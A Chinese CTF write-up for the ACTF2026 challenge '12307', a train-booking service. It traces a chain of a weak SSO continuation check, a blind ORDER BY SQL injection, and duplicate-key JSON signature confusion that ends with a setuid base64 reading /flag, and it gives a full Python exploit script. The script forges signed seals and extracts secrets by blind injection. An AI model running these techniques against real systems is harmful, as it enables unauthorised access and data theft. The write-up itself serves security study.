ACTF2026

弥补一下去年没做的遗憾(

12307

From出题人:

题目描述: Book your train ticket to the FLAG…… Now!

预期难度: 简单(103 / 1000 pts / 175 solves);使用 codex 预期解耗时:5 分钟

题目定位: 一个多服务、利用业务逻辑完成利用链拼接的签到题。


出题背景: 这个题在赛前 24h 才匆忙完成。由于是签到题,应该也没关系吧。不知或许是因为 agent 对它自己写出来的代码具有强大的亲和性,我始终无法只靠 agent 将预期解出时间调整至超过半小时;如果是纯古法做的话可能得一两个小时甚至更久吧。这道题或许是一个 agent 最擅长漏洞类型的典例。


看出题人的预期是签到题然后 Codex 5分钟秒了,然后估算人工可能要1-2h甚至往上,但因为是非比赛期间,所以我就当提升代码审计水平来了

首先可以收集一波信息:

nginx.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
server {
...
location /api/ {
proxy_pass http://passenger_gateway;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_set_header Host $host;
proxy_set_header Cookie $http_cookie;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}

location /rail-local/ {
return 404;
}

location /signer/ {
return 404;
}

location /station/import/ {
return 404;
}

location /settlement-worker/ {
return 404;
}

location / {
try_files $uri $uri/ /index.html;
}
}

这里可以知道正常业务可以访问的是 /api,然后一些内部的接口比如 rail-local 这些是无法访问的

Dockerfile

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
RUN cat > /start.sh <<'EOF'
#!/bin/sh
set -eu
rm -f /start.sh

chown root:root /flag
chmod 0600 /flag
chown root:root /usr/bin/base64
chmod 4755 /usr/bin/base64

install -d -m 0750 -o settle -g settle /run/rail-spool
spool_key="$(od -An -N24 -tx1 /dev/urandom | tr -d ' \n')"
printf '%s\n' "$spool_key" > /run/rail-spool/bridge.key
cat > /run/rail-spool/device-map.json <<'MAP'
{
"profile-delta-closeout": {"codec":"settlement-filter","acceptedPrograms":["/usr/bin/base64"]},
"profile-north-closeout": {"codec":"settlement-filter","acceptedPrograms":["/usr/bin/printf"]},
"profile-baggage-preview": {"codec":"settlement-filter","acceptedPrograms":["/usr/bin/printf"]}
}
MAP

这里可以知道 flag 文件只有 root 才可以读取,但可以发现 base64 这个命令有 sudo 权限,如果可以的话后续可以用 base64 来读取 /flag

至于源码是如何执行一个命令,可以先在 services\print_spooler\worker.pyrun_driver(program, argument)里找到一个:

1
pid = os.posix_spawn(program, [program, argument], os.environ, file_actions=file_actions)

这里执行了 programargument,然后我们来看哪里用到了 run_driver,依旧是 worker.py

1
2
3
4
5
6
7
8
9
10
def handle(raw):
...
program = str(ticket.get("driverProgram", ""))
argument = str(ticket.get("driverArgument", ""))
accepted = route.get("acceptedPrograms")
if not isinstance(accepted, list) or program not in [str(item) for item in accepted]:
publish(ticket_id, "review")
return
value = run_driver(program, argument)
...

可以看到的是 programargument 是读取 driverProgramdriverArgument 的值来得到的

services\depot_layout\app.py 可以找到 ticket 的信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def spool_device(route, context):
print_plan = context.get("printPlan") if isinstance(context.get("printPlan"), dict) else {}
ticket = {
"ticketId": random_id("P", 12),
"deviceRef": route["device_ref"],
"stationCode": route["station_code"],
"driverProfile": route.get("driver_profile", ""),
"codec": route.get("codec", ""),
"driverProgram": str(print_plan.get("driverProgram", ""))[:160],
"driverArgument": str(print_plan.get("driverArgument", ""))[:160],
"context": {
"batchId": context.get("batchId"),
"orderId": context.get("orderId"),
"stationCode": context.get("stationCode"),
},
"issuedAt": int(time.time()),
}

然后 lay_out 是从 services\settlement_worker\worker.py 这里获得请求的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
def bridge_preview(device_ref, context, print_plan):
body = json.dumps({
"deviceRef": str(device_ref)[:64],
"context": {
"batchId": context.get("batchId"),
"orderId": context.get("orderId"),
"stationCode": context.get("stationCode"),
"printPlan": {
"driverProgram": str(print_plan.get("driverProgram", ""))[:160],
"driverArgument": str(print_plan.get("driverArgument", ""))[:160],
},
},
}, separators=(",", ":")).encode()
try:
conn = http.client.HTTPConnection("127.0.0.1", int(os.environ.get("LAYOUT_PORT", "5009")), timeout=3)
conn.request("POST", "/depot/layout/preview", body=body, headers={ # 这里发起请求
"Content-Type": "application/json",
"Content-Length": str(len(body)),
"X-Layout-Bridge": "bureau",
})
resp = conn.getresponse()
payload = resp.read()
if resp.status != 200:
return "[layout-error]"
data = safe_json(payload.decode(errors="replace"), {}) or {}
return str(data.get("value", ""))[:4000]
except Exception as exc:
return f"[layout-error:{exc.__class__.__name__}]"

可以看到这个函数接收了一个 print_plan 的参数,可以在 services\receipt_signer\app.py 里找到:

1
2
3
4
5
6
7
8
9
10
11
12
13
def verify_carrier_seal(data, order, batch_id, template_digest, station_cfg, boarding_channel):
...
print_plan = {
"profile": str(render_view.get("printProfile", "counter-copy"))[:64],
"printer": str(render_view.get("printer", "thermal-standard"))[:64],
"prefix": str(render_view.get("prefix", "reconciliation"))[:48],
"cell": str(render_view.get("cell", "receipt"))[:48],
"ledgerRef": checks["ledgerRef"],
"boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
"driverProgram": str(render_view.get("driverProgram", ""))[:160],
"driverArgument": str(render_view.get("driverArgument", ""))[:160],
}
return print_plan, []

而这个发生在 结算阶段,所以我们可以在这一步的时候插入 base64/flag

知道该如何执行命令了,我们可以回到一开始,分析一下这个项目是如何运作的:

首先是身份问题

前端对应的是 requestIdentity(),在 frontend/src/main.jsx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
async function requestIdentity() {
try {
await api("/api/mobile/identity/continue", {
method: "POST",
body: JSON.stringify({
passenger: passengerName || "Passenger",
relayState: { next: "rail://continue/seat-hold", flow: ["seat-hold"] },
partnerMetadata: {
entityID: "railway-partner",
compatBinding: "x-accel",
role: "PassengerIdentityProvider",
},
assertion: "<Assertion><Audience>12307</Audience><NameID>mobile-passenger</NameID><Signature>RelayState</Signature></Assertion>",
}),
});
await loadWorkspace();
flash("Passenger identity continued");
} catch (error) {
flash(error.data?.error || "Identity continuation failed");
}
}

乘客的身份并不是本地系统直接签发,而是由某个 partner 侧传进来,然后本地再把它补成一个自己的 session

后端在 services/sso_gateway/server.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
async function continueIdentity(req, res) {
...
const ok = partnerContinuation(data);
const sessionId = crypto.randomBytes(18).toString("base64url");
const session = {
state: ok ? "compat-pending" : "pending",
trust: ok ? "partner-continuation" : "unverified",
partnerId: String(data.partnerId || "mobile-partner").slice(0, 64),
stationCode: String(data.stationCode || "BJP").slice(0, 16),
trustLevel: Array.isArray(data.trustLevel) ? data.trustLevel : ["mobile", ok ? "partner" : "guest"],
passenger,
issuedAt: Date.now(),
};
await redisCommand("SET", `rail:sso:session:${sessionId}`, JSON.stringify(session), "EX", "900");
...
}

这个 partnerContinuation(data) 它实际上只是做了一堆字符串匹配,只要数据里出现了一些预期的字段和关键词,就会得到一个 compat-pending 的 session

但除了上面的得到的这个 session,还需要 continuation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
async function completeSession(req, res) {
...
data.state = "complete";
data.completedAt = Date.now();
await redisCommand("SET", `rail:sso:session:${sessionId}`, JSON.stringify(data), "EX", "900");
await redisCommand("SET", `rail:passenger:continuation:${sessionId}`, JSON.stringify({
passenger: data.passenger,
trust: data.trust,
partnerId: data.partnerId || "mobile-partner",
stationCode: data.stationCode || "BJP",
trustLevel: data.trustLevel || ["mobile", "partner"],
completedAt: data.completedAt,
}), "EX", "900");
...
}

services/edge_gateway/server.js 里的 holdFlow() 会先去检查 continuation 状态:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
async function holdFlow(req, res, body) {
const check = await proxy(5002, "/session/check", "GET", Buffer.alloc(0), req.headers);
let seatHoldClass = "";
if (check.status === 204 && check.headers["x-session-continuation"] === "complete") {
seatHoldClass = "quota-sync";
} else if (check.status === 401 && check.headers["x-session-continuation"] === "pending") {
const continued = await proxy(5002, "/_rail/session/check", "GET", Buffer.alloc(0), req.headers, {
"X-Session-Bridge": "continue",
});
if (continued.status === 204) seatHoldClass = "quota-sync";
}

const held = await proxy(5000, "/orders/hold", "POST", body, req.headers, {
"X-Seat-Hold-Class": seatHoldClass,
});
...
}

后面 ticketing_api.create_order() 触发时,会从 cookie 里取 passenger_session,再调用 session_to_mysql()

1
2
3
cookies = parse_cookie(self.headers.get("Cookie", ""))
passenger_session = cookies.get("passenger_session", "guest")
session_to_mysql(passenger_session, passenger)

session_to_mysql() 只有在 continuation 存在时,才会插入partner_trust

1
2
3
4
5
6
raw = redis.command("GET", f"rail:sso:session:{session_id}")
...
continuation = redis.command("GET", f"rail:passenger:continuation:{session_id}")
if continuation:
...
INSERT INTO partner_trust(...)

所以这里可以想知道一点就是,后面的流程需要 continuation

然后就是订票

1
2
3
4
5
6
7
8
9
function TrainCard({ train, seatClass, reserve, requestBoard }) {
const status = seatStatus(train, seatClass);
const fare = Number(train.price || 0) * (seatClass === "business" ? 2.7 : seatClass === "first" ? 1.45 : 1);
return (
...
<span>From <strong>{money(fare)}</strong></span>
<button onClick={() => reserve(train, status)}>{status.left > 0 ? "Reserve" : "Join waitlist"}</button> <!--这里进入一个判断,判断是否有余票-->
);
}

然后 reverse

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
async function reserve(train, status) {
try {
if (status.left <= 0) {
await api("/api/mobile/orders/hold", {
method: "POST",
body: JSON.stringify({ trainId: train.id, seatClass, holdMode: "waitlist" }),
});
}
const passenger = passengerName || workspace.session?.passenger || "Passenger";
const data = await api("/api/mobile/orders", {
method: "POST",
body: JSON.stringify({ trainId: train.id, seatClass, passenger }),
});
flash(data.order.status === "waitlisted" ? `${data.order.trainId} waitlisted` : `${data.order.trainId} reserved`);
await loadWorkspace();
} catch (error) {
flash(error.data?.error === "identity_continuation_required" ? "Complete passenger identity first" : error.data?.error || "Reservation failed");
}
}

会请求 /api/mobile/orders/hold/api/mobile/orders 这两个接口之后就分别进入买票和候补阶段,至于具体怎么做的,先不管,看订票完后面要干嘛

然后是站务desk,这里就给出接口:services/station_portal/app.py

1
2
3
4
5
6
7
station_portal 是 desk 服务
list_notices():列公告
create_notice():站内发布 notice,同时把 proxy_hint 存起来
search_tickets():查 ticket_index
reprice_fare():给某个 station / tariffScope 重新报价
adjust_ticket():基于 claim proof 记一条 adjustment memo
health_import():把 desk 侧事件转发给 station_import

接着就是 station_import

services/station_import/app.py

它根据 adapter 干不同的事:

1
2
3
station-partner-feed:编译站内 notice feed,发布 lane / board profile / partner jwks
station-desk-ledger:消费 ticket_adjustments,把 desk memo 编译成真实业务状态
enterprise-clearing:把 tariff exception claim 激活成 layout entitlement

主要就是写 Redis

再者就是结算

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/api/corporate/reconciliation
-> pricing_sampler.create_batch()
-> 新建 render_jobs

/api/corporate/receipts/prepare
-> enterprise_gateway.mergeLayoutClaim()
-> station_import.enterprise-clearing
-> receipt_signer.validate_context()
-> receipt_signer.verify_carrier_seal()
-> 新建 settlement_receipts
-> Redis 里写一份 rail:receipt:seal:<receipt_id>

/api/corporate/settlement/schedule
-> settlement_scheduler.schedule_batch()
-> Redis LPUSH rail:settlement:jobs

settlement_worker
-> BRPOP rail:settlement:jobs
-> handle_job()
-> load_context()
-> validate()
-> render()
-> 如果有 service-device,就继续 bridge_preview() <-- 这里对应了我们之前分析的可控参数program

bridge_preview()
-> HTTP /depot/layout/preview
-> depot_layout.collect_device()
-> spool_device()
-> Redis LPUSH rail:spool:requests

print_spooler
-> BRPOP rail:spool:requests
-> handle()
-> run_driver(program, argument)
-> Redis LPUSH rail:spool:result:<ticketId>

最后结果再从 Redis 回到 depot_layout
-> settlement_worker.render()
-> MySQL render_results.body

这一段对应到具体代码里,大概是这样:

services/pricing_sampler/app.py

1
2
3
4
5
6
7
8
9
10
11
def create_batch(self, data):
...
template = REPORT_TEMPLATES.get(report_type, REPORT_TEMPLATES["fare-preview"])
template_digest = digest_template(template)
...
execute(
"""
INSERT INTO render_jobs(batch_id,receipt_id,order_id,station_code,template_digest,template_body,data_json,status,created_at,updated_at)
...
"""
)

这里的作用就是先建一个 batch,对应一条 render_jobs

然后就是 services/enterprise_gateway/server.js

1
2
3
4
5
6
7
8
9
if (req.method === "POST" && path === "/api/enterprise/receipts/prepare") {
...
await mergeLayoutClaim(orderId, stationCode);
const cachedLane = await redisGet(`rail:interline:lane:${stationCode}`);
const signerLane = laneFromCache(cachedLane);
...
const response = await forward(SIGNER_PORT, "/signer/receipts/prepare", body, signerHeaders);
...
}

这里先做了一次 mergeLayoutClaim(),也就是先把 layout entitlement 相关的状态补好,然后再去转发给真正的 receipt_signer

mergeLayoutClaim() 实际上会去打 station_import

1
2
3
4
5
6
7
8
9
10
11
12
async function mergeLayoutClaim(orderId, stationCode) {
...
const body = Buffer.from(JSON.stringify({
stationCode,
adapter: "enterprise-clearing",
target: `rail-mesh://clearing/layout?orderId=${encodeURIComponent(orderId)}&stationCode=${encodeURIComponent(stationCode)}`,
payload: "invoice-dispute=merged",
}));
await forward(IMPORT_PORT, "/station/import/probe", body, {
"X-Enterprise-Gateway": "station-mesh",
});
}

station_import 这边:

1
2
if adapter == "enterprise-clearing" and order_id:
return activate_layout_claim(order_id, station_code)

再进入:

1
2
3
4
5
6
7
8
9
def activate_layout_claim(order_id, station_code):
...
execute(
"""
INSERT INTO bureau_layout_cells(...)
"""
)
...
redis.command("SET", f"rail:layout:entitlement:{order_id}", station_code, "EX", "180")

也就是说,这一步意义是:企业准备 receipt 之前,要先确认 layout 权限已经下发

这个状态后面 receipt_signersettlement_worker 都会检查

接着就进入 services/receipt_signer/app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def validate_context(handler, data, batch_id, order, template_digest):
...
profile = one("SELECT * FROM station_profiles WHERE station_code=%s", (station_code,))
_profile, station_cfg = station_policy(station_code)
...
waitlist = one("SELECT * FROM waitlist_entries WHERE order_id=%s", (order["order_id"],))
trust = one(
"SELECT * FROM partner_trust WHERE session_id=%s AND status='accepted' ORDER BY created_at DESC LIMIT 1",
(order["passenger_session"],),
)
...
continuation = live_continuation(order)
boarding_channel = ledger_attestation(order["order_id"], station_code, station_cfg)
layout_entitlement = redis.command("GET", f"rail:layout:entitlement:{order['order_id']}") or ""

这里就能看出 trusted receipt 需要的前置条件:

1
2
3
4
5
6
7
1. 订单必须是 waitlisted
2. waitlist_entries.sampled = 1
3. station_profiles.batch_open = 1,renderer_profile / signer_route
4. partner_trust.status = accepted
5. rail:passenger:continuation 存在
6. rail:ledger:channel 存在
7. rail:layout:entitlement 存在

满足这些之后,就会执行 verify_carrier_seal()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def verify_carrier_seal(data, order, batch_id, template_digest, station_cfg, boarding_channel):
...
public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)
...
for key, expected_value in checks.items():
if str(public_view.get(key, "")) != str(expected_value):
return None, ["partner_receipt_review"]

print_plan = {
"profile": str(render_view.get("printProfile", "counter-copy"))[:64],
"printer": str(render_view.get("printer", "thermal-standard"))[:64],
"prefix": str(render_view.get("prefix", "reconciliation"))[:48],
"cell": str(render_view.get("cell", "receipt"))[:48],
"ledgerRef": checks["ledgerRef"],
"boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
"driverProgram": str(render_view.get("driverProgram", ""))[:160],
"driverArgument": str(render_view.get("driverArgument", ""))[:160],
}
return print_plan, []

注意这里有个非常关键的点:它校验的时候用的是 public_view,生成后续打印参数的时候用的是 render_view,这就导致如果 JSON 里有重复键,那么验证时候的值和实际的值是可以不一样的

然后后面就是我们前面分析的,可以执行 /usr/bin/base64 /flag 的阶段了

那么漏洞可以插在哪里?

身份

services/sso_gateway/server.js

这里 partnerContinuation() 只是做字符串包含判断,外部构造出一个看起来像 partner continuation 的请求,就能拿到一个 compat-pending 的 session

然后再借助 edge_gatewayholdFlow() 自动走 /_rail/session/check 完成 continuation,这样一张后面创建出来的 waitlist order 就带上了可以通过 trusted settlement 检查的 passenger_session

desk 重新报价里的 ORDER BY 注入

services/station_portal/app.py

1
2
3
4
def fare_scope_expression(scope):
...
if scope.get("mode") == "legacy-rank":
return str(scope.get("expr", "ticket_no"))[:240]

然后在:

1
2
3
4
5
sql = (
"SELECT ticket_no,station_code,status FROM ticket_index "
"WHERE station_code IN (%s,'BJP') "
f"ORDER BY {scope} LIMIT 1"
)

这里直接把 expr 拼进了 ORDER BY,所以可以利用 /api/desk/fares/reprice 做布尔盲注,从 station_claim_artifacts 里把 claimProof 对应的内容注入出来

station_import

1
2
3
4
5
6
7
8
create_notice() + station-partner-feed
-> 编译出 lane / board profile / partner jwks

adjust_ticket() + station-desk-ledger
-> 编译出 sampled=1、batch_open=1、renderer_profile、signer_route

enterprise-clearing
-> 编译出 layout entitlement

verify_carrier_seal()

1
2
public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

由于校验和实际渲染的不一样,所以可以覆盖掉前面一个

1
2
3
4
5
6
7
8
{
"printProfile":"counter-copy",
"printer":"thermal-standard",
"printProfile":"clearing-batch",
"printer":"line-printer",
"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"
}

这样校验时 public_view 看到的是前一组值
真正生成 print_planrender_view 拿到的是后一组值


Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#!/usr/bin/env python3
import base64
import hashlib
import hmac
import json
import re
import time

import requests
from websocket import create_connection


BASE = "http://127.0.0.1:62307"

STATION = "HGH"
TRAIN_ID = "G7608"
SEAT_CLASS = "business"
TICKET_QUERY = "HGH"
TRUSTED_POLICY_ID = "POL-HGH-TRUSTED"
TRUSTED_ROUTE = "delta-window-27"
TRUSTED_SECRET = "e94c0a8d-12307-hgh-trusted"
BOARD_STREAM = "seat-window-e27"
BOARD_TOPIC = "seat-consist"
DRIVER_PROGRAM = "/usr/bin/base64"
DRIVER_ARGUMENT = "/flag"


def make_session():
session = requests.Session()
session.trust_env = False
return session


def ensure(ok, message):
if not ok:
raise RuntimeError(message)


def print_step(message):
print(f"[+] {message}", flush=True)


def weak_continue_and_waitlist_channel(session):
data = {
"partnerMetadata": "railway-partner compatBinding PassengerIdentityProvider",
"relayState": ["continue", "seat-hold"],
"assertion": "<Assertion><Audience>12307</Audience><NameID>solver</NameID></Assertion>",
"stationCode": STATION,
"passenger": "solver",
"trustLevel": ["mobile", "partner", "settlement"],
"partnerId": "mobile-partner",
}
resp = session.post(f"{BASE}/api/mobile/identity/continue", json=data)
ensure(resp.status_code == 202, f"identity continue failed: {resp.status_code} {resp.text}")

resp = session.post(
f"{BASE}/api/mobile/orders/hold",
json={"trainId": TRAIN_ID, "seatClass": SEAT_CLASS, "holdMode": "waitlist"},
)
ensure(resp.status_code == 200, f"waitlist channel failed: {resp.status_code} {resp.text}")
ensure("waitlist_session" in session.cookies.get_dict(), "waitlist_session cookie missing")


def create_waitlisted_order(session):
resp = session.post(
f"{BASE}/api/mobile/orders",
json={"trainId": TRAIN_ID, "seatClass": SEAT_CLASS, "passenger": "solver"},
)
ensure(resp.status_code == 201, f"create order failed: {resp.status_code} {resp.text}")
order = resp.json()["order"]
ensure(order["status"] == "waitlisted", f"unexpected order status: {order['status']}")
return order


def seed_notice_feed():
session = make_session()
proxy_hint = (
f"X-Desk-Lane: {TRUSTED_ROUTE}\r\n"
f"X-Board-Window: {BOARD_STREAM}\r\n"
f"X-Desk-Key-Id: {TRUSTED_POLICY_ID}\r\n"
f"X-Desk-Key: {TRUSTED_ROUTE}"
)
resp = session.post(
f"{BASE}/api/desk/notices",
json={"stationCode": STATION, "title": "ops", "body": "ops", "proxyHint": proxy_hint},
)
ensure(resp.status_code == 201, f"create notice failed: {resp.status_code} {resp.text}")

resp = session.post(
f"{BASE}/api/corporate/imports/relay",
json={
"stationCode": STATION,
"adapter": "station-partner-feed",
"target": f"rail-cache://redis/partner/metadata?stationCode={STATION}",
"payload": "",
},
)
ensure(resp.status_code == 200, f"compile feed failed: {resp.status_code} {resp.text}")


def lookup_ticket_no():
session = make_session()
resp = session.get(f"{BASE}/api/desk/tickets/search", params={"q": TICKET_QUERY, "sort": "ticket_no"})
ensure(resp.status_code == 200, f"ticket search failed: {resp.status_code} {resp.text}")
tickets = resp.json().get("tickets", [])
for ticket in tickets:
if ticket.get("trainId") == TRAIN_ID and ticket.get("stationCode") == STATION:
return ticket["ticketNo"]
raise RuntimeError("target ticket not found")


def fare_bucket(expr):
session = make_session()
resp = session.post(
f"{BASE}/api/desk/fares/reprice",
json={
"stationCode": STATION,
"amount": 0,
"tariffScope": {"mode": "legacy-rank", "expr": expr},
},
)
ensure(resp.status_code == 200, f"fare oracle failed: {resp.status_code} {resp.text}")
return resp.json()["quote"]["bucket"]


def leak_claim_proof(order_id):
subquery = (
"SELECT CONCAT('CP-',claim_salt,'-',LEFT(claim_digest,12)) "
f"FROM station_claim_artifacts WHERE order_id='{order_id}'"
)
out = []
for position in range(1, 26):
lo, hi = 0, 127
while lo < hi:
mid = (lo + hi) // 2
expr = (
"station_code='BJP' XOR "
f"(ASCII(SUBSTRING(({subquery}),{position},1))>{mid})"
)
if fare_bucket(expr) == "north-window":
lo = mid + 1
else:
hi = mid
out.append(chr(lo))
return "".join(out)


def apply_adjustment(ticket_no, claim_proof):
session = make_session()
memo = {
"stationCode": STATION,
"channel": "fare-desk",
"lineItems": {
"reason": "FARE-91",
"layout": "folio-grid-27",
"device": "PR-HGH-042",
"enabled": True,
},
}
resp = session.post(
f"{BASE}/api/desk/tickets/adjust",
json={
"ticketNo": ticket_no,
"claimProof": claim_proof,
"memo": json.dumps(memo, separators=(",", ":")),
"delta": 0,
},
)
ensure(resp.status_code == 202, f"ticket adjust failed: {resp.status_code} {resp.text}")


def compile_station_rule(order_id):
session = make_session()
resp = session.post(
f"{BASE}/api/desk/imports/health",
json={
"stationCode": STATION,
"adapter": "station-desk-ledger",
"target": f"rail-cache://redis/settlement/review?orderId={order_id}&stationCode={STATION}",
"payload": "compiled",
},
)
ensure(resp.status_code == 200, f"station rule compile failed: {resp.status_code} {resp.text}")


def create_batch(order_id):
session = make_session()
resp = session.post(
f"{BASE}/api/corporate/reconciliation",
json={
"orderId": order_id,
"stationCode": STATION,
"reportType": "carrier-closeout",
"defer": True,
"data": {"carrier": "solver"},
},
)
ensure(resp.status_code == 202, f"create batch failed: {resp.status_code} {resp.text}")
return resp.json()


def refresh_epoch_and_ledger(order_id):
session = make_session()
weak_continue_and_waitlist_channel(session)

resp = session.post(f"{BASE}/api/mobile/waitlist/pulse", json={"orderId": order_id})
ensure(resp.status_code == 202, f"pulse failed: {resp.status_code} {resp.text}")

wait_cookie = session.cookies.get("waitlist_session")
ws = create_connection(
f"ws://127.0.0.1:62307/api/connect/boarding?stationCode={STATION}",
header=[f"Cookie: waitlist_session={wait_cookie}"],
timeout=5,
enable_multithread=False,
)
try:
hello_required = json.loads(ws.recv())
channel = hello_required["channel"]
ensure(hello_required["topic"] == BOARD_TOPIC, f"unexpected board topic: {hello_required}")

ws.send(json.dumps({"type": "boarding.hello", "channel": channel}))
ready = json.loads(ws.recv())
ensure(ready["event"] == "boarding.ready", f"unexpected ready event: {ready}")

ws.send(json.dumps({
"type": "boarding.bind",
"topic": BOARD_TOPIC,
"trainId": TRAIN_ID,
"seatClass": SEAT_CLASS,
}))
bound = json.loads(ws.recv())
ensure(bound["event"] == "boarding.bound", f"unexpected bound event: {bound}")

ws.send(json.dumps({
"type": "boarding.confirm",
"orderId": order_id,
"stationCode": STATION,
"epoch": "2",
}))
confirmed = json.loads(ws.recv())
ensure(confirmed["event"] == "boarding.confirmed", f"unexpected confirm event: {confirmed}")
return confirmed["ledgerRef"]
finally:
ws.close()


def b64url(data):
return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def craft_carrier_seal(batch_id, order_id, template_digest, ledger_ref):
protected = b64url(json.dumps(
{"alg": "HS256", "typ": "rail-carrier-seal", "kid": TRUSTED_POLICY_ID},
separators=(",", ":"),
).encode())

payload_text = (
"{"
f"\"batchId\":\"{batch_id}\","
f"\"orderId\":\"{order_id}\","
f"\"stationCode\":\"{STATION}\","
f"\"templateDigest\":\"{template_digest}\","
f"\"routeName\":\"{TRUSTED_ROUTE}\","
f"\"ledgerRef\":\"{ledger_ref}\","
"\"printProfile\":\"counter-copy\","
"\"printer\":\"thermal-standard\","
"\"printProfile\":\"clearing-batch\","
"\"printer\":\"line-printer\","
"\"prefix\":\"reconciliation\","
"\"cell\":\"receipt\","
f"\"driverProgram\":\"{DRIVER_PROGRAM}\","
f"\"driverArgument\":\"{DRIVER_ARGUMENT}\""
"}"
)
payload = b64url(payload_text.encode())
signature = b64url(hmac.new(
TRUSTED_SECRET.encode(),
f"{protected}.{payload}".encode(),
hashlib.sha256,
).digest())
return {"protected": protected, "payload": payload, "signature": signature}


def prepare_receipt(order_id, batch_id, template_digest, ledger_ref):
session = make_session()
resp = session.post(
f"{BASE}/api/corporate/receipts/prepare",
json={
"stationCode": STATION,
"orderId": order_id,
"batchId": batch_id,
"templateDigest": template_digest,
"trustLevel": ["mobile", "partner", "settlement"],
"carrierSeal": craft_carrier_seal(batch_id, order_id, template_digest, ledger_ref),
},
)
ensure(resp.status_code == 201, f"prepare receipt failed: {resp.status_code} {resp.text}")


def schedule_and_fetch_flag(batch_id):
session = make_session()
resp = session.post(f"{BASE}/api/corporate/settlement/schedule", json={"batchId": batch_id})
ensure(resp.status_code == 202, f"schedule failed: {resp.status_code} {resp.text}")

for _ in range(30):
time.sleep(0.3)
resp = session.get(f"{BASE}/api/corporate/reconciliation/{batch_id}")
ensure(resp.status_code == 200, f"poll failed: {resp.status_code} {resp.text}")
report = resp.json().get("report")
if not report or not report.get("body"):
continue
body = report["body"]
if not report.get("ready"):
continue
match = re.search(r"([A-Za-z0-9+/=]+)\s*$", body)
ensure(match is not None, f"base64 payload not found in report body: {body}")
flag = base64.b64decode(match.group(1)).decode()
return body, flag
raise RuntimeError("flag not rendered in time")


def main():
print_step("creating initial trusted passenger session and waitlisted order")
order_session = make_session()
weak_continue_and_waitlist_channel(order_session)
order = create_waitlisted_order(order_session)
order_id = order["id"]
print(f"[=] order_id={order_id}", flush=True)

print_step("arming station notice feed to publish lane, board profile and JWKS")
seed_notice_feed()

print_step("locating ticket number for the target station/train")
ticket_no = lookup_ticket_no()
print(f"[=] ticket_no={ticket_no}", flush=True)

print_step("leaking claim proof through the legacy ORDER BY SQL injection oracle")
claim_proof = leak_claim_proof(order_id)
print(f"[=] claim_proof={claim_proof}", flush=True)

print_step("submitting a valid adjustment rule and compiling it into the station ledger")
apply_adjustment(ticket_no, claim_proof)
compile_station_rule(order_id)

print_step("creating a deferred reconciliation batch")
batch = create_batch(order_id)
batch_id = batch["batchId"]
template_digest = batch["templateDigest"]
print(f"[=] batch_id={batch_id}", flush=True)
print(f"[=] template_digest={template_digest}", flush=True)

print_step("refreshing fulfillment epoch and ledger attestation just before signing")
ledger_ref = refresh_epoch_and_ledger(order_id)
print(f"[=] ledger_ref={ledger_ref}", flush=True)

print_step("forging a trusted carrier seal with duplicate JSON keys")
prepare_receipt(order_id, batch_id, template_digest, ledger_ref)

print_step("scheduling settlement rendering and extracting the flag from the report")
body, flag = schedule_and_fetch_flag(batch_id)
print(f"report_body={body}", flush=True)
print(f"flag={flag}", flush=True)


if __name__ == "__main__":
main()


# ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}

PS:感觉AI签到不代表人也是签到(

AAA26

11

GoMySQL

11

RealDLsite

11

TINJ

11